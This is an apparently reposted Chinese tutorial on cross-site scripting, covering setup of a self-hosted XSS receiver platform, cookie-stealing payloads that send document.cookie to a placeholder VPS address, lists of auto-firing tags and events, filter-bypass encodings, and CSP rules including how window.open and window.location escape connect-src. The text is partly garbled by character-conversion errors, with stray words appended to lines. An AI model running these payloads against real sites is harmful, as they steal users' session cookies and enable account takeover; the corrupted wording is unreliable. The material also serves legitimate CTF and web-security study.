xss小结-从xss平台搭建到csp规则
0x00前言javascript
xss是跨站脚本攻击,利用嵌入js代码达到‘控制’对方浏览器的做用,测试的时候咱们是用alert(1)弹窗,而作CTF也好,实际中的漏洞利用也好通常是用xss获取管理员的cookiephp
0x01xss平台搭建css
网上有xss的在线平台,可是别人的总没有本身的用着舒服,因而能够试着手动搭建下属于本身的xss平台html
首先要拥有本身的vps,能有公网的ip,才能把目标的信息发送过来前端
这里搭建推荐用蓝莲花战队的github一个项目:https://github.com/firesunCN/BlueLotus_XSSReceiverjava
你能够搭在vps上的web服务器上,可是该项目提供了docker,可使用docker开放到本身想要的端口git
git clone https://github.com/firesunCN/BlueLotus_XSSReceiver.git && cd BlueLotus_XSSReceiver docker build -t bluelotus . docker run -d -p 81:80 bluelotus
上面3条命令会把xss平台运行到vps的81端口,而后访问本身的vps 81端口的admin.php页面github
登陆密码默认为bluelotus,输入便可进入页面web
稍微提一下怎么使用,在个人js中添加个新的文件,插入第一个模板就行ajax
而后把它的var website的值改为 http://vpsip:port/ 便可,端口就是你开放这个xss平台端口,我是用的81
简单的本地测试利用该js文件获取信息,点击生成payload
把这句话插入到xss的输入中
而后刷新下xss平台的主界面,就能获取cookie了
0x02 XXS基本触发方式
xss检查都是用个alert(1)弹个框来检查,可是实际上都是为了发送cookie来获取有用的信息
发送cookie的方式用ajax,用window.open,用window.location
即将alert(1)的地方替换成以下代码
<script>alert(1)</script>
用如下的代码替换,其中的vpsip:port即0x01中提到的xss平台的ip和端口
<script>window.open("http://vpsip:port/?cookie=" + document.cookie)</script>
<script>window.location="http://vpsip:port/?cookie=" + document.cookie</script>
<script>var xml = new XMLHttpRequest(); xml.open('POST', 'http://vpsip:port', true); xml.setRequestHeader("Content-type","application/x-www-form-urlencoded"); xml.send('cookie='+document.cookie); </script>
触发javascript的方式有三种
1.利用<script>标签,标签内的内容便可以触发javascript的代码
2.利用javascript:伪协议,该方法会用于一些属性里面,举个例子好比在a标签的href属性可使用该伪协议 <a href=javascript:alert(1)>xss</a>
3.利用事件onxxxx,好比在打开文档或图片错误时,报错的事件onerror,举例<img src=x onerror=alert(1) />(x这个图片路径是不存在的,全部会触发onerror)
可以利用的标签有
<script> <a> <p> <img> <body> <button> <var> <div> <iframe> <object> <input> <select> <textarea> <keygen> <frameset> <embed> <svg> <math> <video> <audio>
可以利用的事件有
onload onunload onchange onsubmit onreset onselect onblur onfocus onabort onkeydown onkeypress onkeyup onclick ondbclick onmouseover onmousemove onmouseout onmouseup onforminput onformchange ondrag ondrop onerror
可以利用伪协议的属性有
formaction action href xlink:href autofocus src content data
有些xss须要用户交互才能触发,好比<a>标签,必须用户点击了<a>标签生成的xss连接,才能触发
而有些标签是不用交互,只要可以加载就能触发的,这里罗列下我知道的(在firefox下成功,在chrome下有些会被chrome拦截)
利用<script>标签
<script>alert(1)</script>
利用报错的事件
<img src=x onerror=alert(1) /> <object data=x onerror=alert(1)></object>
<video src=x onerror=alert(1) /> <audio src=x onerror=alert(1) />
利用加载的时候的事件 <iframe onload=alert(1) /> <svg onload=alert(1)></svg> <marquee onstart=alert(1)></marquee>
利用请求资源的时候的伪协议 <iframe src=javascript:alert(1) /> <object data=javascript:alert(1)></object> <object data=x onerror=alert(1)></object> <embed src=javascript:alert(1)></embed>
利用汇集焦点的事件,最后加autofocus是打开页面自动汇集焦点到该标签 <input type=text onfocus=alert(1) autofocus /> <button onfocus=alert(1) autofocus /> <keygen onfocus=alert(1) autofocus /> <select onfocus=alert(1) autofocus /> <textarea onfocus=alert(1) autofocus />
至于其余标签的用法好比<a>标签就要靠点击触发src=javascript:伪协议
或者利用onmousemove鼠标移动到该标签位置, onclick点击触发这些事件,这里就再也不罗列
0x03 XXS一点绕过方法
绕过我知道的很少,简单介绍下我收集的
1.在标签的属性任何位置均可以利用html编码进行绕过
&#ascii码十进制; 例子:t --编码后-> t <a href=javascript:alert(1) >xss</a><a href=javascript:alert(1) >xss</a>
2.在javascript中能够经过String.fromCharCode()函数进行编码成字符串,可是要使用eval来执行
<a href=javascript:eval(String.fromCharCode(97,108,101,114,116,40,49,41)) >xss</a>
等价于
<a href=javascript:eval("alert(1)") >xss</a>
由于若是不加eval,它是这样的,"alert(1)"是被当作字符串,而不是执行代码,因此是不能执行
<a href=javascript:"alert(1)" >xss</a>
3.在javascript中能够经过\x来编码字符成字符串,也是须要eval来执行,道理同上
<a href=javascript:eval("\x61\x6c\x65\x72\x74\x28\x27\x31\x27\x29") >xss</a>
4.在标签中有些地方能够用[/]来代替[空格]
<img src=x onerror=alert(1) /> //正常状况 <img/src=x onerror=alert(1) /> //代替前面的空格 <img src=x onerror=alert(1)//> //代替后面的空格 <img/src=x onerror=alert(1)//> //代替先后的空格 <img src=x/onerror=alert(1) /> //错误没法解析
5.在标签中也能够用%0a%0d换行来代替空格
<img src=x onerror%0a%0d=%0a%0dalert(1) />
<img%0a%0dsrc=x onerror=alert(1) />
6.在javascript中能够利用['']来代替 .
document.cookie document['cookie']
document['coo'+'kie']
7.标签和属性大小写不敏感
<imG sRc=x OnerroR=alert(1) />
0x04 csp基础
csp(Content Security Policy)是网页安全政策
它的存在就是为了防止XSS的
开启方式有2种,一种是在html中的<meta>标签中写入,一种是经过响应头的Content-Security-Policy字段定义
html前端代码
<meta http-equiv="Content-Security-Policy" content="script-src 'self';">
php后端代码
header("Content-Security-Policy: default-src 'self';");
首先了解有哪些值
| * | 容许加载全部资源(没有单引号) |
| 'none' | 不容许加载任何资源 |
| 'self' | 容许加载同源资源 |
| data: | 容许使用data:伪协议 |
| *.sijidou.com | 容许sijdou.com子域的资源加载 |
| sijidou.com | 容许sijidou.com域下的资源加载 |
| 'unsafe-inline' | 容许执行内联资源,如属性,事件,script标签 |
| 'unsafe-eval' | 容许使用eval执行代码 |
| https: | 只容许使用了https:有证书的资源 |
属性有如下内容
1.script-src
这个属性来判断是否可以加载,执行javascript脚本
1)script-src *; 容许全部的js脚原本源
<script src="http://vpsip/1.js"></script> //能触发
<script>alert(1)</script> //不能触发
2)script-src 'self'; 只容许同源的脚本触发
<script src="http://vpsip/1.js"></script> //不能触发
<script>alert(1)</script> //不能触发
<script src="1.js"></script> //调用本地的js文件能触发
3)script-src 'unsafe-inline' 当前页面可使用javascript脚本
<script>alert(1)</script> //能触发
<script>eval("alert(1)")</script> //不能触发
<script src="http://vpsip/1.js"></script> //不能触发
<script src="1.js"></script> //不能触发
4)script-src 'unsafe-inline' 'unsafe-eval' 当前页面可以使用javascript脚本,而且可以使用eval函数
<script>eval("alert(1)")</script> //能触发
<script>alert(1)</script> //能触发
<script src="http://vpsip/1.js"></script> //不能触发
<script src="1.js"></script> //不能触发
5)script-src 'none' 不容许加载任何资源
<script src="http://vpsip/1.js"></script> //不能触发 <script src="1.js"></script> //不能触发 <script>alert(1)</script> //不能触发
2.img-src
该属性是定义图片加载的源的策略
1)img-src * 容许加载任何图片资源
<img src=x onerror=alert(1) /> //可以触发
<img src='http://xxx/1.jpg' /> //容许的
2)img-src 'self' 容许同源的图片被加载
<img src=x onerror=alert(1) /> //也是可以触发的
<img src='http://xxx/1.jpg' /> //不容许
<img src='1.jpg' /> //容许的
3)img-src 'none' 不容许图片被加载
<img src=x onerror=alert(1) /> //也可以触发的
<img src='http://xxx/1.jpg' /> //不容许
<img src='1.jpg' /> //不容许
总的来讲,从哪图片加载若是失败都能触发onerror
3.style-src
该属性是规定css加载的来源
style-src * 容许加载任意的css
<link href="1.css" type="text/css" rel="Stylesheet" /> //容许
#但下面这个不被容许
<style type="text/css">
.main{ width:1002px; margin:0 auto;}
</style>
style-src 'unsafe-line' 能够达到使用内嵌的css样式
#容许 <style type="text/css"> .main{ width:1002px; margin:0 auto;} </style>
4.font-src
该属性是规定字体的加载的来源
和img-src大差不差,可是无法触发onerror之类的事件
5.object-src
该属性定义引用资源的加载来源
能够做用的是下面的标签,效果和img-src相同
<object data=xxx /> <embed src=xx />
6.media-src
该属性规定音频和视频的加载来源
能够做用的是下面的标签,效果和img-src相同
<audio src=x />
<video src=x />
7.connect-src
定义ajax websocket等策略
1)connect-src * 容许ajax或者websocket访问全部目标
<script>var xml = new XMLHttpRequest(); xml.open('POST', 'http://www.baidu.com', true); xml.setRequestHeader("Content-type","application/x-www-form-urlencoded"); xml.send(); </script>
<script>var xml = new XMLHttpRequest(); xml.open('POST', 'http://www.4399.com', true); xml.setRequestHeader("Content-type","application/x-www-form-urlencoded"); xml.send(); </script>
2)connect -src http://www.baidu.com/ 只容许ajax或者websocket访问http://www.baidu.com,若是不是就不被容许
#被容许
<script>var xml = new XMLHttpRequest(); xml.open('POST', 'http://www.baidu.com', true); xml.setRequestHeader("Content-type","application/x-www-form-urlencoded"); xml.send(); </script>
#不被容许
<script>var xml = new XMLHttpRequest(); xml.open('POST', 'http://www.bilibili.com', true); xml.setRequestHeader("Content-type","application/x-www-form-urlencoded"); xml.send(); </script>
可是丝绝不影响window.open和window.location的发送
#在connect-src http://www.baidu.com/ 被容许的
<script>window.open("http://vpsip:port/?cookie=" + document.cookie)</script>
##在connect-src http://www.baidu.com/ 被容许的
<script>window.location="http://vpsip:port/?cookie=" + document.cookie</script>
8.child-src
定义frame的来源,是frame-src的改进版
1)child-src * 容许载入全部的其余源页面
<iframe src=http://www.4399.com /> //经过 <iframe src=http://www.baidu.com /> //经过
2)child-src http://www.baidu.com/ 只容许载入百度的页面
<iframe src=http://www.4399.com /> //不经过 <iframe src=http://www.baidu.com /> //经过
可是也不影响onload事件的触发
<iframe src=http://www.4399.com onload=alert(1) />
9.default-src
默认资源定义,若是只设置了 script-src 和 default-src,那么其余的img-src style-src等7个属性和default-src的规则相同
0x05 csp的组合规则
能够看到若是在没有script-src和default-src(来定义script-src规则)的状况下,其余的csp防御也是能经过事件之类的来执行javascript代码
1)child-src *;default-src * 这种状况下容许加载任何页面,可是不能运行javascript脚本(default-src定义了script-src的规则)
<iframe src=http://www.baidu.com onload=alert(1) /> //能加载百度页面,没发弹框
只要script-src没有unsafe-inline值,那么该页面就不能执行javascript代码,不管是不是<script>标签内容,属性的javascript:伪协议,事件的执行
2)object-src data:;default-src * 运行使用data:协议,这种咱们能够利用javascript代码弹框
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==></object> //被容许
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==解码结果是<script>alert(1)</script>
3)object-src javascript:;default-src * 运行javascript:协议,可是由于default-src *来规定了script-src没有unsafe-inline值,那么看着就是矛盾的了,这时候判断是不执行
<object data=javascript:alert(1) /> //不被容许
总结一下就是除了某些标签的data:伪协议能够加载页面(好比<object>标签)能够逃过没有script-src 'inline'在页面上执行javascript代码的状况,其余想要执行javascript代码必需要有script-src 'inline'或者没有定义script-src和default-src规则
以前看<link>能够预加载之类的文章,可是我本地没有成功,也不知道是否是Firefox和chrome的版本更新后对这个问题已经有了处理了
0xFF结语
gitbub上的笔记:https://github.com/SiJiDo/XSS-note
虽然有点乱,可是仍是能看
参考连接
http://www.javashuo.com/article/p-mtxwkvxf-gr.html
https://www.leavesongs.com/PENETRATION/xss-collect.html
http://www.cnblogs.com/iamstudy/articles/bypass_csp_study.html
https://lorexxar.cn/2016/08/08/ccsp/#%E4%BB%80%E4%B9%88%E6%98%AFCSP
- 1. xss平台搭建
- 2. XSS————一、XSS测试平台搭建
- 3. 搭建我的xss平台
- 4. windows下XSS平台搭建
- 5. XSS测试平台搭建
- 6. XSS平台搭建(xsser.me)
- 7. XSS练习平台【XSS Challenges】
- 8. 在虚拟机上搭建xss平台
- 9. 从零开始搭建轻量级个人XSS平台
- 10. XSS平台-学习
- 更多相关文章...
- • ionic 平台 - ionic 教程
- • RDF 规则 - RDF 教程
- • 适用于PHP初学者的学习线路和建议
- • 算法总结-双指针
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. vs2019运行opencv图片显示代码时,窗口乱码
- 2. app自动化 - 元素定位不到?别慌,看完你就能解决
- 3. 在Win8下用cisco ××× Client连接时报Reason 422错误的解决方法
- 4. eclipse快速补全代码
- 5. Eclipse中Java/Html/Css/Jsp/JavaScript等代码的格式化
- 6. idea+spring boot +mabitys(wanglezapin)+mysql (1)
- 7. 勒索病毒发生变种 新文件名将带有“.UIWIX”后缀
- 8. 【原创】Python 源文件编码解读
- 9. iOS9企业部署分发问题深入了解与解决
- 10. 安装pytorch报错CondaHTTPError:******
- 1. xss平台搭建
- 2. XSS————一、XSS测试平台搭建
- 3. 搭建我的xss平台
- 4. windows下XSS平台搭建
- 5. XSS测试平台搭建
- 6. XSS平台搭建(xsser.me)
- 7. XSS练习平台【XSS Challenges】
- 8. 在虚拟机上搭建xss平台
- 9. 从零开始搭建轻量级个人XSS平台
- 10. XSS平台-学习